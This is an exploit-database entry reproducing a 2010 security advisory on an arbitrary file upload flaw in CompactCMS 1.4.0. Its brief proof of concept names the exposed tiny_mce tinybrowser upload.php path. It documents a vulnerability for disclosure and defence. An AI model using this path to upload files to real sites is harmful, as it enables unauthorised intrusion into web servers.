CompactCMS 1.4.0 - 'tiny_mce' Arbitrary File Upload

Author: ITSecTeam
type: webapps
platform: php
port: 
date_added: 2010-05-14 
date_updated: 2017-09-08 
verified: 1 
codes: OSVDB-64715;OSVDB-64714 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comCompactCMS.zip

##########################################################
#Title: CompactCMS 1.4.0 (tiny_mce) Remote File Upload
#Vendor: http://www.compactcms.nl/
##########################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability52.htm
#Thanks: r3dm0v3, pejvak, am!rkh@n
##########################################################

#DESCRIPTION (by vendor):#################################
CompactCMS might just be the tenth CMS you considered using for your website.
If that's true, ask yourself why you haven't found the right Content
Management
System just yet. CompactCMS is light-weight, truly efficient and fully
Ajax loaded.

#POC:#####################################################
http://site.com/admin/includes/tiny_mce/plugins/
tinybrowser/upload.php